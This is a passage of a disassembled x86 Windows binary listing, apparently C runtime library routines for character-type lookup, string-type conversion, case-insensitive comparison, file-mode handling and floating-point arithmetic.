loc_4386F1: ; CODE XREF: sub_4384E0+1F1�j
; sub_4384E0+206�j
mov [ebp+var_8], 70h
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_4386FA: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438980�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_438711
mov eax, [ebp+arg_10]
mov ecx, [eax+98h]
mov [ebp+var_10], ecx
jmp short loc_43871D
; ---------------------------------------------------------------------------
loc_438711: ; CODE XREF: sub_4384E0+221�j
mov edx, [ebp+arg_10]
mov eax, [edx+9Ch]
mov [ebp+var_10], eax
loc_43871D: ; CODE XREF: sub_4384E0+22F�j
; sub_4384E0+2DF�j
cmp [ebp+var_C], 0
jle loc_4387C4
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jbe loc_4387C4
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_438787
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 1
jbe short loc_438787
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+var_10]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_438787: ; CODE XREF: sub_4384E0+26E�j
; sub_4384E0+276�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+var_10]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
jmp loc_43871D
; ---------------------------------------------------------------------------
loc_4387C4: ; CODE XREF: sub_4384E0+241�j
; sub_4384E0+24D�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
jmp loc_4384E6
; ---------------------------------------------------------------------------
loc_4387CF: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:off_438960�o
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jz loc_4388A2
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
mov [ebp+arg_0], edx
loc_4387E6: ; CODE XREF: sub_4384E0+3BB�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_4388A0
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0
jz loc_4388A0
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 27h
jnz short loc_438819
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp loc_4388A0
; ---------------------------------------------------------------------------
loc_438819: ; CODE XREF: sub_4384E0+329�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_43886C
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 1
jbe short loc_43886C
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [ebp+arg_0]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_43886C: ; CODE XREF: sub_4384E0+353�j
; sub_4384E0+35B�j
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp loc_4387E6
; ---------------------------------------------------------------------------
loc_4388A0: ; CODE XREF: sub_4384E0+30E�j
; sub_4384E0+31A�j ...
jmp short loc_4388AB
; ---------------------------------------------------------------------------
loc_4388A2: ; CODE XREF: sub_4384E0+2F7�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
mov [ebp+arg_0], eax
loc_4388AB: ; CODE XREF: sub_4384E0:loc_4388A0�j
jmp loc_4384E6
; ---------------------------------------------------------------------------
loc_4388B0: ; CODE XREF: sub_4384E0+80�j
; sub_4384E0+91�j ...
movsx ecx, [ebp+var_8]
test ecx, ecx
jz short loc_4388DC
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov al, [ebp+var_8]
push eax
call sub_437D10
add esp, 14h
mov ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
jmp short loc_438957
; ---------------------------------------------------------------------------
loc_4388DC: ; CODE XREF: sub_4384E0+3D6�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_438928
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_438928: ; CODE XREF: sub_4384E0+417�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [ebp+arg_0]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_438957: ; CODE XREF: sub_4384E0+3FA�j
jmp loc_4384E6
; ---------------------------------------------------------------------------
loc_43895C: ; CODE XREF: sub_4384E0+E�j
; sub_4384E0+1A�j
mov esp, ebp
pop ebp
retn
sub_4384E0 endp
; ---------------------------------------------------------------------------
off_438960 dd offset loc_4387CF ; DATA XREF: sub_4384E0+91�r
dd offset loc_4386B3
dd offset loc_43863E
dd offset loc_438578
dd offset loc_4385B6
dd offset loc_438617
dd offset loc_438665
dd offset loc_43868C
dd offset loc_4386FA
dd offset loc_4385F4
dd offset loc_4388B0
byte_43898C db 0 ; DATA XREF: sub_4384E0+8B�r
db 3 dup(0Ah)
dd 5 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A0A0Ah, 0A0A020Ah, 0A030A0Ah
dd 4 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A040Ah, 0A0A050Ah, 0A060A0Ah
dd 0A0A0A0Ah, 0A0A0807h
db 2 dup(0Ah), 9
off_4389DF dd offset loc_438597 ; DATA XREF: sub_4384E0+B0�r
dd offset loc_4385A1
dd offset loc_4385A7
dd offset loc_4385AD
off_4389EF dd offset loc_4385D5 ; DATA XREF: sub_4384E0+EE�r
; ---------------------------------------------------------------------------
fild word ptr [ebp-7A1AFFBDh]
inc ebx
add bl, ch
test [ebx+0], eax
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438A00 proc near ; CODE XREF: sub_433A50+41�p
; sub_433A50+60�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0A8h
cmp [ebp+arg_0], 1
jnz loc_438B69
mov eax, [ebp+arg_C]
mov [ebp+var_90], eax
lea ecx, [ebp+var_8C]
mov [ebp+var_C], ecx
mov [ebp+var_4], 0
mov [ebp+var_94], 80h
push 0
mov edx, [ebp+var_94]
push edx
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_439920
add esp, 14h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz loc_438AEF
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_438A70
jmp loc_438B4D
; ---------------------------------------------------------------------------
loc_438A70: ; CODE XREF: sub_438A00+69�j
push 0
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_439920
add esp, 14h
mov [ebp+var_94], eax
cmp [ebp+var_94], 0
jnz short loc_438A9A
jmp loc_438B4D
; ---------------------------------------------------------------------------
loc_438A9A: ; CODE XREF: sub_438A00+93�j
push 58h
push offset aInithelp_c ; "inithelp.c"
push 2
mov edx, [ebp+var_94]
push edx
call sub_41BE70
add esp, 10h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_438AC0
jmp loc_438B4D
; ---------------------------------------------------------------------------
loc_438AC0: ; CODE XREF: sub_438A00+B9�j
mov [ebp+var_4], 1
push 0
mov eax, [ebp+var_94]
push eax
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_439920
add esp, 14h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_438AEF
jmp short loc_438B4D
; ---------------------------------------------------------------------------
loc_438AEF: ; CODE XREF: sub_438A00+5A�j
; sub_438A00+EB�j
push 63h
push offset aInithelp_c ; "inithelp.c"
push 2
mov ecx, [ebp+var_8]
push ecx
call sub_41BE70
add esp, 10h
mov edx, [ebp+var_90]
mov [edx], eax
mov eax, [ebp+var_90]
cmp dword ptr [eax], 0
jnz short loc_438B19
jmp short loc_438B4D
; ---------------------------------------------------------------------------
loc_438B19: ; CODE XREF: sub_438A00+115�j
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_90]
mov ecx, [eax]
push ecx
call sub_41E510
add esp, 0Ch
cmp [ebp+var_4], 0
jz short loc_438B46
push 2
mov edx, [ebp+var_C]
push edx
call sub_41CA10
add esp, 8
loc_438B46: ; CODE XREF: sub_438A00+136�j
xor eax, eax
jmp loc_438C86
; ---------------------------------------------------------------------------
loc_438B4D: ; CODE XREF: sub_438A00+6B�j
; sub_438A00+95�j ...
cmp [ebp+var_4], 0
jz short loc_438B61
push 2
mov eax, [ebp+var_C]
push eax
call sub_41CA10
add esp, 8
loc_438B61: ; CODE XREF: sub_438A00+151�j
or eax, 0FFFFFFFFh
jmp loc_438C86
; ---------------------------------------------------------------------------
loc_438B69: ; CODE XREF: sub_438A00+D�j
cmp [ebp+arg_0], 0
jnz loc_438C83
mov [ebp+var_A4], 4
mov ecx, [ebp+arg_C]
mov [ebp+var_9C], ecx
push 0
mov edx, [ebp+var_A4]
push edx
push offset byte_4F367C
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_439780
add esp, 14h
test eax, eax
jnz short loc_438BB0
or eax, 0FFFFFFFFh
jmp loc_438C86
; ---------------------------------------------------------------------------
loc_438BB0: ; CODE XREF: sub_438A00+1A6�j
mov edx, [ebp+var_9C]
mov byte ptr [edx], 0
mov [ebp+var_A0], 0
jmp short loc_438BD4
; ---------------------------------------------------------------------------
loc_438BC5: ; CODE XREF: sub_438A00:loc_438C7A�j
mov eax, [ebp+var_A0]
add eax, 1
mov [ebp+var_A0], eax
loc_438BD4: ; CODE XREF: sub_438A00+1C3�j
cmp [ebp+var_A0], 4
jge loc_438C7F
cmp ds:dword_453DF0, 1
jle short loc_438C1B
push 4
mov ecx, [ebp+var_A0]
mov dl, ds:byte_4F367C[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
push eax
call sub_427040
add esp, 8
mov [ebp+var_A8], eax
jmp short loc_438C4E
; ---------------------------------------------------------------------------
loc_438C1B: ; CODE XREF: sub_438A00+1E8�j
mov ecx, [ebp+var_A0]
mov dl, ds:byte_4F367C[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_A8], edx
loc_438C4E: ; CODE XREF: sub_438A00+219�j
cmp [ebp+var_A8], 0
jz short loc_438C78
mov eax, [ebp+var_9C]
movsx ecx, byte ptr [eax]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_98]
lea eax, [ecx+edx-30h]
mov ecx, [ebp+var_9C]
mov [ecx], al
jmp short loc_438C7A
; ---------------------------------------------------------------------------
loc_438C78: ; CODE XREF: sub_438A00+255�j
jmp short loc_438C7F
; ---------------------------------------------------------------------------
loc_438C7A: ; CODE XREF: sub_438A00+276�j
jmp loc_438BC5
; ---------------------------------------------------------------------------
loc_438C7F: ; CODE XREF: sub_438A00+1DB�j
; sub_438A00:loc_438C78�j
xor eax, eax
jmp short loc_438C86
; ---------------------------------------------------------------------------
loc_438C83: ; CODE XREF: sub_438A00+16D�j
or eax, 0FFFFFFFFh
loc_438C86: ; CODE XREF: sub_438A00+148�j
; sub_438A00+164�j ...
mov esp, ebp
pop ebp
retn
sub_438A00 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, ds:off_454E18
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438CA0 proc near ; CODE XREF: sub_434A80+216�p
; sub_43B770+50�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E048
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFDCh
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F3688, 0
jnz short loc_438D1E
lea eax, [ebp+var_1C]
push eax
push 1
push offset dword_43D410
push 1
call ds:dword_4F5304 ; GetStringTypeW
test eax, eax
jz short loc_438CF2
mov ds:dword_4F3688, 1
jmp short loc_438D1E
; ---------------------------------------------------------------------------
loc_438CF2: ; CODE XREF: sub_438CA0+44�j
lea ecx, [ebp+var_1C]
push ecx
push 1
push offset dword_43D40C
push 1
push 0
call ds:dword_4F5308 ; GetStringTypeA
test eax, eax
jz short loc_438D17
mov ds:dword_4F3688, 2
jmp short loc_438D1E
; ---------------------------------------------------------------------------
loc_438D17: ; CODE XREF: sub_438CA0+69�j
xor eax, eax
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438D1E: ; CODE XREF: sub_438CA0+2D�j
; sub_438CA0+50�j ...
cmp ds:dword_4F3688, 1
jnz short loc_438D42
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4F5304 ; GetStringTypeW
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438D42: ; CODE XREF: sub_438CA0+85�j
cmp ds:dword_4F3688, 2
jnz loc_438EF7
cmp [ebp+arg_10], 0
jnz short loc_438D5D
mov eax, ds:dword_4F3408
mov [ebp+arg_10], eax
loc_438D5D: ; CODE XREF: sub_438CA0+B3�j
push 0
push 0
push 0
push 0
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
push 220h
mov eax, [ebp+arg_10]
push eax
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_438D8C
xor eax, eax
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438D8C: ; CODE XREF: sub_438CA0+E3�j
mov [ebp+var_4], 0
mov eax, [ebp+var_28]
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_30]
mov [ebp+var_2C], ecx
mov edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+var_2C]
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_438DDE
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_2C], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_438DDE: ; CODE XREF: sub_438CA0+125�j
cmp [ebp+var_2C], 0
jnz short loc_438DEB
xor eax, eax
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438DEB: ; CODE XREF: sub_438CA0+142�j
push 0
push 0
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
push 220h
mov edx, [ebp+arg_10]
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jnz short loc_438E19
xor eax, eax
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438E19: ; CODE XREF: sub_438CA0+170�j
mov [ebp+var_4], 1
mov eax, [ebp+var_28]
lea eax, [eax+eax+2]
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_34]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_438E5D
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_438E5D: ; CODE XREF: sub_438CA0+1A4�j
cmp [ebp+var_24], 0
jnz short loc_438E6A
xor eax, eax
jmp loc_438EF9
; ---------------------------------------------------------------------------
loc_438E6A: ; CODE XREF: sub_438CA0+1C1�j
cmp [ebp+arg_14], 0
jnz short loc_438E79
mov edx, ds:dword_4F33F8
mov [ebp+arg_14], edx
loc_438E79: ; CODE XREF: sub_438CA0+1CE�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
mov word ptr [ecx+eax*2], 0FFFFh
mov edx, [ebp+arg_8]
mov eax, [ebp+var_24]
mov word ptr [eax+edx*2-2], 0FFFFh
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_14]
push edx
call ds:dword_4F5308 ; GetStringTypeA
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
xor edx, edx
mov dx, [ecx+eax*2-2]
cmp edx, 0FFFFh
jz short loc_438ED8
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_24]
xor edx, edx
mov dx, [ecx+eax*2]
cmp edx, 0FFFFh
jz short loc_438EDC
loc_438ED8: ; CODE XREF: sub_438CA0+222�j
xor eax, eax
jmp short loc_438EF9
; ---------------------------------------------------------------------------
loc_438EDC: ; CODE XREF: sub_438CA0+236�j
mov eax, [ebp+arg_8]
shl eax, 1
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_420840
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_438EF9
; ---------------------------------------------------------------------------
loc_438EF7: ; CODE XREF: sub_438CA0+A9�j
xor eax, eax
loc_438EF9: ; CODE XREF: sub_438CA0+79�j
; sub_438CA0+9D�j ...
lea esp, [ebp-40h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_438CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438F10 proc near ; CODE XREF: sub_435200+11B�p
; sub_435200+2D4�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz loc_43900A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
lea eax, dword_4F33F0
cmp dword ptr [eax+8], 0
jnz short loc_438F81
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_438F3C: ; CODE XREF: sub_438F10+53�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_438F65
or al, al
jz short loc_438F65
inc esi
inc edi
cmp ah, bh
jb short loc_438F54
cmp ah, bl
ja short loc_438F54
add ah, dh
loc_438F54: ; CODE XREF: sub_438F10+3C�j
; sub_438F10+40�j
cmp al, bh
jb short loc_438F5E
cmp al, bl
ja short loc_438F5E
add al, dh
loc_438F5E: ; CODE XREF: sub_438F10+46�j
; sub_438F10+4A�j
cmp ah, al
jnz short loc_438F6F
dec ecx
jnz short loc_438F3C
loc_438F65: ; CODE XREF: sub_438F10+32�j
; sub_438F10+36�j
xor ecx, ecx
cmp ah, al
jz loc_43900A
loc_438F6F: ; CODE XREF: sub_438F10+50�j
mov ecx, 0FFFFFFFFh
jb loc_43900A
neg ecx
jmp loc_43900A
; ---------------------------------------------------------------------------
loc_438F81: ; CODE XREF: sub_438F10+21�j
lock inc ds:dword_4F37C8
cmp ds:dword_4F37C4, 0
jg short loc_438F95
push 0
jmp short loc_438FAE
; ---------------------------------------------------------------------------
loc_438F95: ; CODE XREF: sub_438F10+7F�j
lock dec ds:dword_4F37C8
mov ebx, ecx
push 13h
call sub_423280
mov [esp+10h+var_10], 1
mov ecx, ebx
loc_438FAE: ; CODE XREF: sub_438F10+83�j
xor eax, eax
xor ebx, ebx
mov edi, edi
loc_438FB4: ; CODE XREF: sub_438F10+CD�j
mov al, [esi]
or eax, eax
mov bl, [edi]
jz short loc_438FDF
or ebx, ebx
jz short loc_438FDF
inc esi
inc edi
push ecx
push eax
push ebx
call sub_421D30
mov ebx, eax
add esp, 4
call sub_421D30
add esp, 4
pop ecx
cmp eax, ebx
jnz short loc_438FE5
dec ecx
jnz short loc_438FB4
loc_438FDF: ; CODE XREF: sub_438F10+AA�j
; sub_438F10+AE�j
xor ecx, ecx
cmp eax, ebx
jz short loc_438FEE
loc_438FE5: ; CODE XREF: sub_438F10+CA�j
mov ecx, 0FFFFFFFFh
jb short loc_438FEE
neg ecx
loc_438FEE: ; CODE XREF: sub_438F10+D3�j
; sub_438F10+DA�j
pop eax
or eax, eax
jnz short loc_438FFC
lock dec ds:dword_4F37C8
jmp short loc_43900A
; ---------------------------------------------------------------------------
loc_438FFC: ; CODE XREF: sub_438F10+E1�j
mov ebx, ecx
push 13h
call sub_423320
add esp, 4
mov ecx, ebx
loc_43900A: ; CODE XREF: sub_438F10+B�j
; sub_438F10+59�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_438F10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
cmp eax, ds:dword_4F37C0
jnb short loc_439051
mov ecx, [ebp+8]
sar ecx, 5
mov edx, [ebp+8]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_439061
loc_439051: ; CODE XREF: _0:0043902D�j
call sub_429A90
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp short loc_43908F
; ---------------------------------------------------------------------------
loc_439061: ; CODE XREF: _0:0043904F�j
mov edx, [ebp+8]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_4390A0
add esp, 8
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_431100
add esp, 4
mov eax, [ebp-4]
loc_43908F: ; CODE XREF: _0:0043905F�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4390A0 proc near ; CODE XREF: sub_435EC0+D4�p
; sub_435EC0+1A6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 80h
mov [ebp+var_4], eax
cmp [ebp+arg_4], 8000h
jnz short loc_439109
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
mov cl, [eax+edx+4]
and cl, 7Fh
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov edx, ds:dword_4F36C0[edx*4]
mov [edx+eax+4], cl
jmp short loc_43915A
; ---------------------------------------------------------------------------
loc_439109: ; CODE XREF: sub_4390A0+2E�j
cmp [ebp+arg_4], 4000h
jnz short loc_43914A
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov al, [edx+ecx+4]
or al, 80h
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov ecx, ds:dword_4F36C0[ecx*4]
mov [ecx+edx+4], al
jmp short loc_43915A
; ---------------------------------------------------------------------------
loc_43914A: ; CODE XREF: sub_4390A0+70�j
call sub_429A90
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp short loc_43916B
; ---------------------------------------------------------------------------
loc_43915A: ; CODE XREF: sub_4390A0+67�j
; sub_4390A0+A8�j
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, 8000h
loc_43916B: ; CODE XREF: sub_4390A0+B8�j
mov esp, ebp
pop ebp
retn
sub_4390A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439170 proc near ; CODE XREF: sub_436F70+2B5�p
; sub_4395B0+B5�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
mov word ptr [ebp+var_2C], 0
mov [ebp+var_4], 0
mov [ebp+var_14], 0
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov cx, [eax+0Ah]
mov word ptr [ebp+var_18], cx
mov edx, [ebp+arg_4]
mov ax, [edx+0Ah]
mov word ptr [ebp+var_20], ax
mov ecx, [ebp+var_18]
and ecx, 0FFFFh
mov edx, [ebp+var_20]
and edx, 0FFFFh
xor ecx, edx
and ecx, 8000h
mov word ptr [ebp+var_2C], cx
mov ax, word ptr [ebp+var_18]
and ax, 7FFFh
mov word ptr [ebp+var_18], ax
mov cx, word ptr [ebp+var_20]
and cx, 7FFFh
mov word ptr [ebp+var_20], cx
mov edx, [ebp+var_18]
and edx, 0FFFFh
mov eax, [ebp+var_20]
and eax, 0FFFFh
add edx, eax
mov word ptr [ebp+var_30], dx
mov ecx, [ebp+var_18]
and ecx, 0FFFFh
cmp ecx, 7FFFh
jge short loc_43922D
mov edx, [ebp+var_20]
and edx, 0FFFFh
cmp edx, 7FFFh
jge short loc_43922D
mov eax, [ebp+var_30]
and eax, 0FFFFh
cmp eax, 0BFFDh
jle short loc_439264
loc_43922D: ; CODE XREF: sub_439170+9B�j
; sub_439170+AC�j
mov ecx, [ebp+var_2C]
and ecx, 0FFFFh
neg ecx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
